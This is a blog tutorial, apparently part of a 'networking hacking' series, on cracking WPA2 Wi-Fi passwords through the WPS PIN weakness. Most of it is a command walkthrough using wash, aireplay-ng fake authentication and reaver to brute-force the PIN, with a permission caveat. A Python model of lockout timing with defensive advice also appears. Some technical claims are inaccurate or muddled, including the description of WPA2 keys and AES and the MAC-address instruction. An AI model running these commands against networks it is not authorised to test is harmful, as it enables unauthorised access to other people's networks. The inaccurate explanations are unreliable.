HACKER'S PARADISE

What is a WPA2 password and how to crack it? – Networking Hacking – Part 8

In this post, I will discuss what a WPA2 password is and how to crack it using Kali Linux in VirtualBox.

What is a WPA2 password?

  1. WPA2 stands for WiFi Protected Access 2.
  2. It came after WEP, because WEP was easy to crack and less secure than WPA2.
  3. WPA2 is based on IEEE 802.11i and takes a different approach to protecting the password when it is sent over the air.
  4. It is also more secure because it uses AES (Advanced Encryption Standard) encryption for its passwords.
  5. A WPA2 key is a 64-digit hexadecimal key, which further enhances the security.

But there is a flaw in WPA2, i.e. the WPS (WiFi Protected Setup) feature. It was originally introduced to make life easier, so people could easily connect to wireless printers, scanners, etc.

But now it has become a loophole, and if it is misconfigured we can very easily crack the WPA2 password.

Limitation of WPS feature in WPA2

  1. In the WPS method, authentication is done with an 8-digit PIN.
  2. Because 8 digits is a very small number, we can try all possible PINs in a relatively short amount of time.
  3. The WPS PIN can then also be used to find the original password.
  4. If the router uses PBC (Push Button Configuration), the attack will fail.
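
To put numbers on point 2, the following Python sketch (an added example, not part of the original post) models the worst-case time to exhaust the WPS PIN space with and without a lockout after failed attempts. The 2 seconds per attempt and the three lockout policies are assumed values; the 11,000-candidate figure reflects the publicly documented fact that WPS confirms the two halves of the PIN separately and that the last digit is a checksum.

```python
import math


def naive_pin_space(digits=8):
    """PIN space if all 8 digits were independent and checked together."""
    return 10 ** digits


def effective_pin_space():
    """Candidates needed when the two PIN halves are confirmed separately.

    First half: 4 free digits. Second half: 3 free digits plus a checksum.
    """
    return 10 ** 4 + 10 ** 3


def exhaust_seconds(candidates, secs_per_try, tries_before_lock=None, lock_secs=0):
    """Worst-case seconds to try every candidate under a lockout policy."""
    active = candidates * secs_per_try
    if not tries_before_lock:
        return active
    # One lockout follows every full batch of failures except the last batch.
    lockouts = math.ceil(candidates / tries_before_lock) - 1
    return active + lockouts * lock_secs


SECS_PER_TRY = 2  # assumed average time for one PIN exchange
POLICIES = {      # assumed router behaviours: (failures before lock, lock seconds)
    "no lockout": (None, 0),
    "3 tries, 60 s lock": (3, 60),
    "3 tries, 1 h lock": (3, 3600),
}


def report():
    """Return {policy name: worst-case days to exhaust the effective space}."""
    rows = {}
    for name, (tries, lock) in POLICIES.items():
        secs = exhaust_seconds(effective_pin_space(), SECS_PER_TRY, tries, lock)
        rows[name] = round(secs / 86400, 2)
    return rows


if __name__ == "__main__":
    print("naive space:", naive_pin_space(), "effective:", effective_pin_space())
    for policy, days in report().items():
        print(f"{policy:20s} {days:8.2f} days")
```

With these assumptions a short lockout only stretches the exhaustion time from hours to days, so when auditing a router the useful settings are a long lockout or turning the PIN method off entirely.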

First, we will enable monitor mode on our external WiFi adapter. If you do not know how to enable monitor mode on your external WiFi adapter, you can see my post below and easily learn it.

Once monitor mode is enabled, you can continue.

First, we will find all the routers in range that have WPS enabled. Make sure you have permission to attack the router, or use your own router. In the tutorial below I have used my router, on which I have full permissions.

>> wash --interface wlan0

Press Ctrl + c to stop the command.

>> aireplay-ng --fakeauth 30 -a (MAC address of target) -h (MAC address of your adapter, which you can get by running ifconfig, taking the first six characters of it and replacing "-" with ":") wlan0

But don't execute it yet; wait.

First, in a new window, enter the command below and execute it.

>> reaver --bssid xxxxxxxxxx --channel x --interface wlan0 -vvv --no-associate

-vvv - shows what is happening while the command runs and displays information, so we can see whether any error occurs.

--no-associate - tells reaver not to associate with the MAC address, as we will do it manually.

After executing this command, execute the aireplay-ng fake authentication command.

Now we will wait and let it do the work until our PIN is found. If you are not able to find the PIN, then most probably WPS is configured correctly, and we will discuss further how to handle this situation.
